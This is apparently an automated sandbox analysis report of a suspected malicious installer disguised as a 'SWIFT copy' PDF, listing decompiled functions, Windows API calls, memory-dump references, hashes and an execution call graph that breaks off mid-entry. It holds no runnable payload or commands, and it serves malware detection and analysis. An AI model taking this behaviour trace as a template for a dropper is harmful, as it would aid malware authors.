                                      Function 100010E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,00000001), ref: 10001258
                                        • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                      • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                      • GlobalFree.KERNEL32(?), ref: 100011C7
                                      • GlobalFree.KERNEL32(?), ref: 100011F5
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134294229538.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000006.00000002.134294192586.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.134294264369.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      • Associated: 00000006.00000002.134294303301.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_10000000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Global$Free$Alloclstrcpy
                                      • String ID:
                                      • API String ID: 852173138-0
                                      • Opcode ID: c9149b92212d33adc4212204361ca6219cf995c9886f0e0edac76aa4d1876c43
                                      • Instruction ID: 26a7307167ea038f6128c28db1d5d02e0c11c1c5116c5a7ce728bb40d8b914e2
                                      • Opcode Fuzzy Hash: c9149b92212d33adc4212204361ca6219cf995c9886f0e0edac76aa4d1876c43
                                      • Instruction Fuzzy Hash: E431BAB2808254AFF705CF64EC89AEA7FE8EB052C0B164116FA45D626CDB349910CB28
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040578A Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,0040599C,00000000,[Rename]), ref: 0040579A
                                      • lstrcmpiA.KERNEL32(?,?), ref: 004057B2
                                      • CharNextA.USER32(?,?,00000000,0040599C,00000000,[Rename]), ref: 004057C3
                                      • lstrlenA.KERNEL32(?,?,00000000,0040599C,00000000,[Rename]), ref: 004057CC
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: lstrlen$CharNextlstrcmpi
                                      • String ID:
                                      • API String ID: 190613189-0
                                      • Opcode ID: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
                                      • Instruction ID: df48b93824ef6af08d299fa443af8079e3e9d2208639ace1cb57769ac35cd01d
                                      • Opcode Fuzzy Hash: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
                                      • Instruction Fuzzy Hash: DBF0C235504518FFC7029BA5DC4099FBBB8EF45350F2540AAF800F7210D274EE01ABA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:0.2%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:1333
                                      Total number of Limit Nodes:0
                                      execution_graph 2721 4019c0 2729 402a07 2721->2729 2724 402a07 18 API calls 2725 4019d0 2724->2725 2726 4019d7 lstrcmpiA 2725->2726 2727 4019e9 lstrcmpA 2725->2727 2728 4019dd 2726->2728 2727->2728 2730 402a13 2729->2730 2735 405b99 2730->2735 2732 4019c7 2732->2724 2751 405ba6 2735->2751 2736 405dc9 2737 402a34 2736->2737 2769 405b77 lstrcpynA 2736->2769 2737->2732 2753 405de2 2737->2753 2739 405c47 GetVersion 2739->2751 2740 405da0 lstrlenA 2740->2751 2741 405b99 10 API calls 2741->2740 2744 405cbf GetSystemDirectoryA 2744->2751 2746 405cd2 GetWindowsDirectoryA 2746->2751 2747 405de2 5 API calls 2747->2751 2748 405b99 10 API calls 2748->2751 2749 405d49 lstrcatA 2749->2751 2750 405d06 SHGetSpecialFolderLocation 2750->2751 2752 405d1e SHGetPathFromIDListA CoTaskMemFree 2750->2752 2751->2736 2751->2739 2751->2740 2751->2741 2751->2744 2751->2746 2751->2747 2751->2748 2751->2749 2751->2750 2762 405a5e RegOpenKeyExA 2751->2762 2767 405ad5 wsprintfA 2751->2767 2768 405b77 lstrcpynA 2751->2768 2752->2751 2760 405dee 2753->2760 2754 405e56 2755 405e5a CharPrevA 2754->2755 2757 405e75 2754->2757 2755->2754 2756 405e4b CharNextA 2756->2754 2756->2760 2757->2732 2759 405e39 CharNextA 2759->2760 2760->2754 2760->2756 2760->2759 2761 405e46 CharNextA 2760->2761 2770 40564f 2760->2770 2761->2756 2763 405a91 RegQueryValueExA 2762->2763 2764 405acf 2762->2764 2765 405ab2 RegCloseKey 2763->2765 2764->2751 2765->2764 2767->2751 2768->2751 2769->2737 2771 405655 2770->2771 2772 405668 2771->2772 2773 40565b CharNextA 2771->2773 2772->2760 2773->2771 2774 402cc1 2783 402cc6 2774->2783 2776 402e12 2777 402bcf 6 API calls 2776->2777 2778 402e0b 2777->2778 2780 402da6 2781 402bcf 6 API calls 2780->2781 2782 402daf 2781->2782 2782->2778 2784 402ddf GlobalAlloc 2782->2784 2805 4030a4 SetFilePointer 2782->2805 2783->2776 2783->2778 2783->2780 2792 403072 ReadFile 2783->2792 2794 402bcf 2783->2794 2806 4030a4 SetFilePointer 2784->2806 2787 402dc8 2788 403072 ReadFile 2787->2788 2789 402dd3 2788->2789 2789->2778 2789->2784 2790 402dfa 2790->2778 2790->2790 2791 402e43 SetFilePointer 2790->2791 2791->2778 2793 403093 2792->2793 2793->2783 2795 402bf0 2794->2795 2796 402bd8 2794->2796 2799 402c00 GetTickCount 2795->2799 2800 402bf8 2795->2800 2797 402be1 DestroyWindow 2796->2797 2798 402be8 2796->2798 2797->2798 2798->2783 2802 402c31 2799->2802 2803 402c0e CreateDialogParamA ShowWindow 2799->2803 2807 405edb 2800->2807 2802->2783 2803->2802 2805->2787 2806->2790 2808 405ef8 PeekMessageA 2807->2808 2809 402bfe 2808->2809 2810 405eee DispatchMessageA 2808->2810 2809->2783 2810->2808 2811 404fc2 2812 404fe3 GetDlgItem GetDlgItem GetDlgItem 2811->2812 2813 40516e 2811->2813 2857 403ebc SendMessageA 2812->2857 2815 405177 GetDlgItem CreateThread CloseHandle 2813->2815 2816 40519f 2813->2816 2815->2816 2818 4051ca 2816->2818 2819 4051b6 ShowWindow ShowWindow 2816->2819 2820 4051ec 2816->2820 2817 405054 2822 40505b GetClientRect GetSystemMetrics SendMessageA SendMessageA 2817->2822 2823 405228 2818->2823 2825 405201 ShowWindow 2818->2825 2826 4051db 2818->2826 2862 403ebc SendMessageA 2819->2862 2866 403eee 2820->2866 2830 4050ca 2822->2830 2831 4050ae SendMessageA SendMessageA 2822->2831 2823->2820 2832 405233 SendMessageA 2823->2832 2828 405221 2825->2828 2829 405213 2825->2829 2863 403e60 2826->2863 2827 4051fa 2835 403e60 SendMessageA 2828->2835 2880 404e84 2829->2880 2836 4050dd 2830->2836 2837 4050cf SendMessageA 2830->2837 2831->2830 2832->2827 2838 40524c CreatePopupMenu 2832->2838 2835->2823 2858 403e87 2836->2858 2837->2836 2839 405b99 18 API calls 2838->2839 2841 40525c AppendMenuA 2839->2841 2843 405282 2841->2843 2844 40526f GetWindowRect 2841->2844 2842 4050ed 2845 4050f6 ShowWindow 2842->2845 2846 40512a GetDlgItem SendMessageA 2842->2846 2848 40528b TrackPopupMenu 2843->2848 2844->2848 2849 405119 2845->2849 2850 40510c ShowWindow 2845->2850 2846->2827 2847 405151 SendMessageA SendMessageA 2846->2847 2847->2827 2848->2827 2851 4052a9 2848->2851 2861 403ebc SendMessageA 2849->2861 2850->2849 2852 4052c5 SendMessageA 2851->2852 2852->2852 2854 4052e2 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 2852->2854 2855 405304 SendMessageA 2854->2855 2855->2855 2856 405326 GlobalUnlock SetClipboardData CloseClipboard 2855->2856 2856->2827 2857->2817 2859 405b99 18 API calls 2858->2859 2860 403e92 SetDlgItemTextA 2859->2860 2860->2842 2861->2846 2862->2818 2864 403e67 2863->2864 2865 403e6d SendMessageA 2863->2865 2864->2865 2865->2820 2867 403f8f 2866->2867 2868 403f06 GetWindowLongA 2866->2868 2867->2827 2868->2867 2869 403f17 2868->2869 2870 403f26 GetSysColor 2869->2870 2871 403f29 2869->2871 2870->2871 2872 403f39 SetBkMode 2871->2872 2873 403f2f SetTextColor 2871->2873 2874 403f51 GetSysColor 2872->2874 2875 403f57 2872->2875 2873->2872 2874->2875 2876 403f68 2875->2876 2877 403f5e SetBkColor 2875->2877 2876->2867 2878 403f82 CreateBrushIndirect 2876->2878 2879 403f7b DeleteObject 2876->2879 2877->2876 2878->2867 2879->2878 2881 404e9f 2880->2881 2889 404f42 2880->2889 2882 404ebc lstrlenA 2881->2882 2883 405b99 18 API calls 2881->2883 2884 404ee5 2882->2884 2885 404eca lstrlenA 2882->2885 2883->2882 2886 404ef8 2884->2886 2887 404eeb SetWindowTextA 2884->2887 2888 404edc lstrcatA 2885->2888 2885->2889 2886->2889 2890 404efe SendMessageA SendMessageA SendMessageA 2886->2890 2887->2886 2888->2884 2889->2828 2890->2889 2891 4042c5 2892 4042f1 2891->2892 2893 404302 2891->2893 2952 40538c GetDlgItemTextA 2892->2952 2895 40430e GetDlgItem 2893->2895 2901 40436d 2893->2901 2898 404322 2895->2898 2896 404451 2900 4045ec 2896->2900 2967 40538c GetDlgItemTextA 2896->2967 2897 4042fc 2899 405de2 5 API calls 2897->2899 2903 404336 SetWindowTextA 2898->2903 2953 4056bd CharNextA CharNextA 2898->2953 2899->2893 2908 403eee 8 API calls 2900->2908 2901->2896 2901->2900 2905 405b99 18 API calls 2901->2905 2907 403e87 19 API calls 2903->2907 2910 4043e1 SHBrowseForFolderA 2905->2910 2906 404481 2968 405712 2906->2968 2912 404352 2907->2912 2913 404600 2908->2913 2910->2896 2914 4043f9 CoTaskMemFree 2910->2914 2916 403e87 19 API calls 2912->2916 2918 405624 3 API calls 2914->2918 2919 404360 2916->2919 2920 404406 2918->2920 2962 403ebc SendMessageA 2919->2962 2923 40443d SetDlgItemTextA 2920->2923 2928 405b99 18 API calls 2920->2928 2923->2896 2924 404366 2963 405ea2 GetModuleHandleA 2924->2963 2925 40449e 2927 405ea2 3 API calls 2925->2927 2934 4044a6 2927->2934 2929 404425 lstrcmpiA 2928->2929 2929->2923 2932 404436 lstrcatA 2929->2932 2930 4044e0 2987 405b77 lstrcpynA 2930->2987 2932->2923 2933 4044e7 2935 4056bd 4 API calls 2933->2935 2934->2930 2940 404531 2934->2940 2983 40566b lstrlenA 2934->2983 2936 4044ed GetDiskFreeSpaceA 2935->2936 2939 40450f MulDiv 2936->2939 2936->2940 2939->2940 2941 40459b 2940->2941 2988 40466d 2940->2988 2942 4045be 2941->2942 2996 40140b 2941->2996 2999 403ea9 EnableWindow 2942->2999 2945 40458d 2947 404592 2945->2947 2948 40459d SetDlgItemTextA 2945->2948 2950 40466d 21 API calls 2947->2950 2948->2941 2949 4045da 2949->2900 3000 40425a 2949->3000 2950->2941 2952->2897 2954 4056d8 2953->2954 2958 4056e8 2953->2958 2955 4056e3 CharNextA 2954->2955 2954->2958 2956 40432c 2955->2956 2956->2903 2959 405624 lstrlenA CharPrevA 2956->2959 2957 40564f CharNextA 2957->2958 2958->2956 2958->2957 2960 405649 2959->2960 2961 40563e lstrcatA 2959->2961 2960->2903 2961->2960 2962->2924 2964 405ec9 GetProcAddress 2963->2964 2965 405ebe LoadLibraryA 2963->2965 2966 405ed6 2964->2966 2965->2964 2965->2966 2966->2901 2967->2906 3003 405b77 lstrcpynA 2968->3003 2970 405723 2971 4056bd 4 API calls 2970->2971 2972 405729 2971->2972 2973 404487 2972->2973 2974 405de2 5 API calls 2972->2974 2982 405b77 lstrcpynA 2973->2982 2980 405739 2974->2980 2975 405764 lstrlenA 2976 40576f 2975->2976 2975->2980 2978 405624 3 API calls 2976->2978 2979 405774 GetFileAttributesA 2978->2979 2979->2973 2980->2973 2980->2975 2981 40566b 2 API calls 2980->2981 3004 405e7b FindFirstFileA 2980->3004 2981->2975 2982->2925 2984 405678 2983->2984 2985 405689 2984->2985 2986 40567d CharPrevA 2984->2986 2985->2934 2986->2984 2986->2985 2987->2933 2989 404687 2988->2989 2990 405b99 18 API calls 2989->2990 2991 4046bc 2990->2991 2992 405b99 18 API calls 2991->2992 2993 4046c7 2992->2993 2994 405b99 18 API calls 2993->2994 2995 4046f8 lstrlenA wsprintfA SetDlgItemTextA 2994->2995 2995->2945 3007 401389 2996->3007 2999->2949 3001 404268 3000->3001 3002 40426d SendMessageA 3000->3002 3001->3002 3002->2900 3003->2970 3005 405e91 FindClose 3004->3005 3006 405e9c 3004->3006 3005->3006 3006->2980 3009 401390 3007->3009 3008 4013fe 3008->2942 3009->3008 3010 4013cb MulDiv SendMessageA 3009->3010 3010->3009 3011 4023c6 3022 402b11 3011->3022 3013 4023d0 3014 402a07 18 API calls 3013->3014 3015 4023d9 3014->3015 3016 4023e3 RegQueryValueExA 3015->3016 3019 40266d 3015->3019 3017 402409 RegCloseKey 3016->3017 3018 402403 3016->3018 3017->3019 3018->3017 3026 405ad5 wsprintfA 3018->3026 3023 402a07 18 API calls 3022->3023 3024 402b2a 3023->3024 3025 402b38 RegOpenKeyExA 3024->3025 3025->3013 3026->3017 3030 402b4c 3031 402b5b SetTimer 3030->3031 3033 402b74 3030->3033 3031->3033 3032 402bc9 3033->3032 3034 402b8e MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 3033->3034 3034->3032 3035 401ccc GetDlgItem GetClientRect 3036 402a07 18 API calls 3035->3036 3037 401cfc LoadImageA SendMessageA 3036->3037 3038 401d1a DeleteObject 3037->3038 3039 40289c 3037->3039 3038->3039 3040 40264f 3041 402a07 18 API calls 3040->3041 3042 402656 FindFirstFileA 3041->3042 3043 402679 3042->3043 3047 402669 3042->3047 3048 405ad5 wsprintfA 3043->3048 3045 402680 3049 405b77 lstrcpynA 3045->3049 3048->3045 3049->3047 3050 4024cf 3051 4024d4 3050->3051 3052 4024e5 3050->3052 3059 4029ea 3051->3059 3054 402a07 18 API calls 3052->3054 3055 4024ec lstrlenA 3054->3055 3056 4024db 3055->3056 3057 40250b WriteFile 3056->3057 3058 40266d 3056->3058 3057->3058 3060 405b99 18 API calls 3059->3060 3061 4029fe 3060->3061 3061->3056 3062 401650 3063 402a07 18 API calls 3062->3063 3064 401657 3063->3064 3065 402a07 18 API calls 3064->3065 3066 401660 3065->3066 3067 402a07 18 API calls 3066->3067 3068 401669 MoveFileA 3067->3068 3069 401675 3068->3069 3070 40167c 3068->3070 3081 401423 3069->3081 3071 405e7b 2 API calls 3070->3071 3074 40217f 3070->3074 3073 40168b 3071->3073 3073->3074 3076 405a2b 3073->3076 3077 405ea2 3 API calls 3076->3077 3079 405a32 3077->3079 3080 405a53 3079->3080 3084 40589d lstrcpyA 3079->3084 3080->3069 3082 404e84 25 API calls 3081->3082 3083 401431 3082->3083 3083->3074 3085 4058c6 3084->3085 3086 4058ec GetShortPathNameA 3084->3086 3108 405825 GetFileAttributesA CreateFileA 3085->3108 3088 405901 3086->3088 3089 405a25 3086->3089 3088->3089 3091 405909 wsprintfA 3088->3091 3089->3080 3090 4058d0 CloseHandle GetShortPathNameA 3090->3089 3092 4058e4 3090->3092 3093 405b99 18 API calls 3091->3093 3092->3086 3092->3089 3094 405931 3093->3094 3109 405825 GetFileAttributesA CreateFileA 3094->3109 3096 40593e 3096->3089 3097 40594d GetFileSize GlobalAlloc 3096->3097 3098 405a1e CloseHandle 3097->3098 3099 40596f ReadFile 3097->3099 3098->3089 3099->3098 3100 405987 3099->3100 3100->3098 3110 40578a lstrlenA 3100->3110 3103 4059a0 lstrcpyA 3106 4059c2 3103->3106 3104 4059b4 3105 40578a 4 API calls 3104->3105 3105->3106 3107 4059f9 SetFilePointer WriteFile GlobalFree 3106->3107 3107->3098 3108->3090 3109->3096 3111 4057cb lstrlenA 3110->3111 3112 4057d3 3111->3112 3113 4057a4 lstrcmpiA 3111->3113 3112->3103 3112->3104 3113->3112 3114 4057c2 CharNextA 3113->3114 3114->3111 3115 403fd0 3116 403fe6 3115->3116 3123 4040f2 3115->3123 3120 403e87 19 API calls 3116->3120 3117 404161 3118 404235 3117->3118 3119 40416b GetDlgItem 3117->3119 3126 403eee 8 API calls 3118->3126 3121 404181 3119->3121 3122 4041f3 3119->3122 3124 40403c 3120->3124 3121->3122 3129 4041a7 6 API calls 3121->3129 3122->3118 3130 404205 3122->3130 3123->3117 3123->3118 3125 404136 GetDlgItem SendMessageA 3123->3125 3127 403e87 19 API calls 3124->3127 3146 403ea9 EnableWindow 3125->3146 3137 404230 3126->3137 3128 404049 CheckDlgButton 3127->3128 3144 403ea9 EnableWindow 3128->3144 3129->3122 3133 40420b SendMessageA 3130->3133 3134 40421c 3130->3134 3133->3134 3134->3137 3138 404222 SendMessageA 3134->3138 3135 40415c 3139 40425a SendMessageA 3135->3139 3136 404067 GetDlgItem 3145 403ebc SendMessageA 3136->3145 3138->3137 3139->3117 3141 40407d SendMessageA 3142 4040a4 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 3141->3142 3143 40409b GetSysColor 3141->3143 3142->3137 3143->3142 3144->3136 3145->3141 3146->3135 3147 4014d6 3148 4029ea 18 API calls 3147->3148 3149 4014dc Sleep 3148->3149 3151 40289c 3149->3151 3152 401dd8 3153 402a07 18 API calls 3152->3153 3154 401dde 3153->3154 3155 402a07 18 API calls 3154->3155 3156 401de7 3155->3156 3157 402a07 18 API calls 3156->3157 3158 401df0 3157->3158 3159 402a07 18 API calls 3158->3159 3160 401df9 3159->3160 3161 401423 25 API calls 3160->3161 3162 401e00 ShellExecuteA 3161->3162 3163 401e2d 3162->3163 2718 5191c83 2719 5191cba 2718->2719 2719->2718 2720 5191cd6 Sleep 2719->2720 2720->2718 3164 40155b 3165 401577 ShowWindow 3164->3165 3166 40157e 3164->3166 3165->3166 3167 40289c 3166->3167 3168 40158c ShowWindow 3166->3168 3168->3167 3169 401edc 3170 402a07 18 API calls 3169->3170 3171 401ee3 GetFileVersionInfoSizeA 3170->3171 3172 401f06 GlobalAlloc 3171->3172 3173 401f5c 3171->3173 3172->3173 3174 401f1a GetFileVersionInfoA 3172->3174 3174->3173 3175 401f2b VerQueryValueA 3174->3175 3175->3173 3176 401f44 3175->3176 3180 405ad5 wsprintfA 3176->3180 3178 401f50 3181 405ad5 wsprintfA 3178->3181 3180->3178 3181->3173 3182 4025dd 3183 4025e4 3182->3183 3184 402849 3182->3184 3185 4029ea 18 API calls 3183->3185 3186 4025ef 3185->3186 3187 4025f6 SetFilePointer 3186->3187 3187->3184 3188 402606 3187->3188 3190 405ad5 wsprintfA 3188->3190 3190->3184 3191 4035e0 3192 4035eb 3191->3192 3193 4035f2 GlobalAlloc 3192->3193 3194 4035ef 3192->3194 3193->3194 3200 4018e3 3201 40191a 3200->3201 3202 402a07 18 API calls 3201->3202 3203 40191f 3202->3203 3206 405454 3203->3206 3207 405712 18 API calls 3206->3207 3208 405474 3207->3208 3209 405493 3208->3209 3210 40547c DeleteFileA 3208->3210 3211 4055c1 3209->3211 3243 405b77 lstrcpynA 3209->3243 3238 401928 3210->3238 3216 405e7b 2 API calls 3211->3216 3211->3238 3213 4054b9 3214 4054cc 3213->3214 3215 4054bf lstrcatA 3213->3215 3218 40566b 2 API calls 3214->3218 3217 4054d2 3215->3217 3220 4055e5 3216->3220 3219 4054e0 lstrcatA 3217->3219 3221 4054eb lstrlenA FindFirstFileA 3217->3221 3218->3217 3219->3221 3222 405624 3 API calls 3220->3222 3220->3238 3221->3211 3241 40550f 3221->3241 3224 4055ef 3222->3224 3223 40564f CharNextA 3223->3241 3225 40540c 5 API calls 3224->3225 3226 4055fb 3225->3226 3227 405615 3226->3227 3231 4055ff 3226->3231 3228 404e84 25 API calls 3227->3228 3228->3238 3229 4055a0 FindNextFileA 3232 4055b8 FindClose 3229->3232 3229->3241 3233 404e84 25 API calls 3231->3233 3231->3238 3232->3211 3234 40560c 3233->3234 3235 405a2b 40 API calls 3234->3235 3235->3238 3237 405454 64 API calls 3237->3241 3239 404e84 25 API calls 3239->3229 3240 404e84 25 API calls 3240->3241 3241->3223 3241->3229 3241->3237 3241->3239 3241->3240 3242 405a2b 40 API calls 3241->3242 3244 405b77 lstrcpynA 3241->3244 3245 40540c 3241->3245 3242->3241 3243->3213 3244->3241 3253 405800 GetFileAttributesA 3245->3253 3248 405439 3248->3241 3249 405427 RemoveDirectoryA 3251 405435 3249->3251 3250 40542f DeleteFileA 3250->3251 3251->3248 3252 405445 SetFileAttributesA 3251->3252 3252->3248 3254 405812 SetFileAttributesA 3253->3254 3255 405418 3253->3255 3254->3255 3255->3248 3255->3249 3255->3250 3256 4018e6 3257 402a07 18 API calls 3256->3257 3258 4018ed 3257->3258 3261 4053a8 3258->3261 3262 4053bd 3261->3262 3263 4018f6 3262->3263 3264 4053d1 MessageBoxIndirectA 3262->3264 3264->3263 3265 401f68 3266 401f7a 3265->3266 3267 402028 3265->3267 3268 402a07 18 API calls 3266->3268 3270 401423 25 API calls 3267->3270 3269 401f81 3268->3269 3271 402a07 18 API calls 3269->3271 3276 40217f 3270->3276 3272 401f8a 3271->3272 3273 401f92 GetModuleHandleA 3272->3273 3274 401f9f LoadLibraryExA 3272->3274 3273->3274 3275 401faf GetProcAddress 3273->3275 3274->3267 3274->3275 3277 401ffb 3275->3277 3278 401fbe 3275->3278 3279 404e84 25 API calls 3277->3279 3280 401423 25 API calls 3278->3280 3281 401fce 3278->3281 3279->3281 3280->3281 3281->3276 3282 40201c FreeLibrary 3281->3282 3282->3276 3283 405e6d 3284 405e6e 3283->3284 3285 405e75 3284->3285 3286 405e5a CharPrevA 3284->3286 3286->3284 3287 4030ef #17 SetErrorMode OleInitialize 3288 405ea2 3 API calls 3287->3288 3289 403134 SHGetFileInfoA 3288->3289 3351 405b77 lstrcpynA 3289->3351 3291 40315f GetCommandLineA 3352 405b77 lstrcpynA 3291->3352 3293 403171 GetModuleHandleA 3294 403192 3293->3294 3295 40564f CharNextA 3294->3295 3296 40319c CharNextA 3295->3296 3300 4031ac 3296->3300 3297 403271 GetTempPathA 3353 4030bb 3297->3353 3300->3297 3303 40564f CharNextA 3300->3303 3301 40329c DeleteFileA 3304 403305 3301->3304 3303->3300 3307 40564f CharNextA 3304->3307 3309 4033a0 3304->3309 3337 403390 3304->3337 3310 403325 3307->3310 3417 403548 3309->3417 3317 40336b 3310->3317 3318 4033cf lstrcatA lstrcmpiA 3310->3318 3311 4033b9 3314 4053a8 MessageBoxIndirectA 3311->3314 3312 4034ad 3313 403530 ExitProcess 3312->3313 3315 405ea2 3 API calls 3312->3315 3319 4033c7 ExitProcess 3314->3319 3320 4034bc 3315->3320 3321 405712 18 API calls 3317->3321 3318->3309 3322 4033eb CreateDirectoryA SetCurrentDirectoryA 3318->3322 3323 405ea2 3 API calls 3320->3323 3324 403376 3321->3324 3325 403402 3322->3325 3326 40340d 3322->3326 3328 4034c5 3323->3328 3324->3309 3361 405b77 lstrcpynA 3324->3361 3424 405b77 lstrcpynA 3325->3424 3425 405b77 lstrcpynA 3326->3425 3330 405ea2 3 API calls 3328->3330 3333 4034ce 3330->3333 3332 403385 3362 405b77 lstrcpynA 3332->3362 3336 40351c ExitWindowsEx 3333->3336 3342 4034dc GetCurrentProcess 3333->3342 3335 405b99 18 API calls 3338 40344c DeleteFileA 3335->3338 3336->3313 3339 403529 3336->3339 3363 403622 3337->3363 3340 403459 CopyFileA 3338->3340 3348 40341b 3338->3348 3341 40140b 2 API calls 3339->3341 3340->3348 3341->3313 3346 4034ec 3342->3346 3343 4034a1 3344 405a2b 40 API calls 3343->3344 3344->3309 3345 405a2b 40 API calls 3345->3348 3346->3336 3347 405b99 18 API calls 3347->3348 3348->3335 3348->3343 3348->3345 3348->3347 3350 40348d CloseHandle 3348->3350 3426 405347 CreateProcessA 3348->3426 3350->3348 3351->3291 3352->3293 3354 405de2 5 API calls 3353->3354 3356 4030c7 3354->3356 3355 4030d1 3355->3301 3356->3355 3357 405624 3 API calls 3356->3357 3358 4030d9 CreateDirectoryA 3357->3358 3429 405854 3358->3429 3361->3332 3362->3337 3364 405ea2 3 API calls 3363->3364 3365 403636 3364->3365 3366 40363c 3365->3366 3367 40364e 3365->3367 3433 405ad5 wsprintfA 3366->3433 3368 405a5e 3 API calls 3367->3368 3369 403679 3368->3369 3370 403697 lstrcatA 3369->3370 3372 405a5e 3 API calls 3369->3372 3373 40364c 3370->3373 3372->3370 3434 4038e7 3373->3434 3376 405712 18 API calls 3377 4036c9 3376->3377 3378 403752 3377->3378 3380 405a5e 3 API calls 3377->3380 3379 405712 18 API calls 3378->3379 3381 403758 3379->3381 3382 4036f5 3380->3382 3383 403768 LoadImageA 3381->3383 3384 405b99 18 API calls 3381->3384 3382->3378 3389 403711 lstrlenA 3382->3389 3390 40564f CharNextA 3382->3390 3385 40380e 3383->3385 3386 40378f RegisterClassA 3383->3386 3384->3383 3388 40140b 2 API calls 3385->3388 3387 4037c5 SystemParametersInfoA CreateWindowExA 3386->3387 3416 403818 3386->3416 3387->3385 3393 403814 3388->3393 3391 403745 3389->3391 3392 40371f lstrcmpiA 3389->3392 3394 40370f 3390->3394 3396 405624 3 API calls 3391->3396 3392->3391 3395 40372f GetFileAttributesA 3392->3395 3398 4038e7 19 API calls 3393->3398 3393->3416 3394->3389 3397 40373b 3395->3397 3399 40374b 3396->3399 3397->3391 3400 40566b 2 API calls 3397->3400 3401 403825 3398->3401 3443 405b77 lstrcpynA 3399->3443 3400->3391 3403 403831 ShowWindow LoadLibraryA 3401->3403 3404 4038b4 3401->3404 3406 403850 LoadLibraryA 3403->3406 3407 403857 GetClassInfoA 3403->3407 3444 404f56 OleInitialize 3404->3444 3406->3407 3409 403881 DialogBoxParamA 3407->3409 3410 40386b GetClassInfoA RegisterClassA 3407->3410 3408 4038ba 3412 4038d6 3408->3412 3413 4038be 3408->3413 3411 40140b 2 API calls 3409->3411 3410->3409 3411->3416 3414 40140b 2 API calls 3412->3414 3415 40140b 2 API calls 3413->3415 3413->3416 3414->3416 3415->3416 3416->3309 3418 403560 3417->3418 3419 403552 CloseHandle 3417->3419 3455 40358d 3418->3455 3419->3418 3422 405454 71 API calls 3423 4033a9 OleUninitialize 3422->3423 3423->3311 3423->3312 3424->3326 3425->3348 3427 405382 3426->3427 3428 405376 CloseHandle 3426->3428 3427->3348 3428->3427 3430 40585f GetTickCount GetTempFileNameA 3429->3430 3431 4030ed 3430->3431 3432 40588c 3430->3432 3431->3301 3432->3430 3432->3431 3433->3373 3435 4038fb 3434->3435 3451 405ad5 wsprintfA 3435->3451 3437 40396c 3438 405b99 18 API calls 3437->3438 3439 403978 SetWindowTextA 3438->3439 3440 403994 3439->3440 3441 4036a7 3439->3441 3440->3441 3442 405b99 18 API calls 3440->3442 3441->3376 3442->3440 3443->3378 3452 403ed3 3444->3452 3446 404fa0 3447 403ed3 SendMessageA 3446->3447 3449 404fb2 OleUninitialize 3447->3449 3448 404f79 3448->3446 3450 401389 2 API calls 3448->3450 3449->3408 3450->3448 3451->3437 3453 403eeb 3452->3453 3454 403edc SendMessageA 3452->3454 3453->3448 3454->3453 3457 40359b 3455->3457 3456 403565 3456->3422 3457->3456 3458 4035a0 FreeLibrary GlobalFree 3457->3458 3458->3456 3458->3458 3459 4014f0 SetForegroundWindow 3460 40289c 3459->3460 3461 401af0 3462 402a07 18 API calls 3461->3462 3463 401af7 3462->3463 3464 4029ea 18 API calls 3463->3464 3465 401b00 wsprintfA 3464->3465 3466 40289c 3465->3466 3467 4019f1 3468 402a07 18 API calls 3467->3468 3469 4019fa ExpandEnvironmentStringsA 3468->3469 3470 401a0e 3469->3470 3472 401a21 3469->3472 3471 401a13 lstrcmpA 3470->3471 3470->3472 3471->3472 3473 402877 SendMessageA 3474 402891 InvalidateRect 3473->3474 3475 40289c 3473->3475 3474->3475 3476 401c78 3477 4029ea 18 API calls 3476->3477 3478 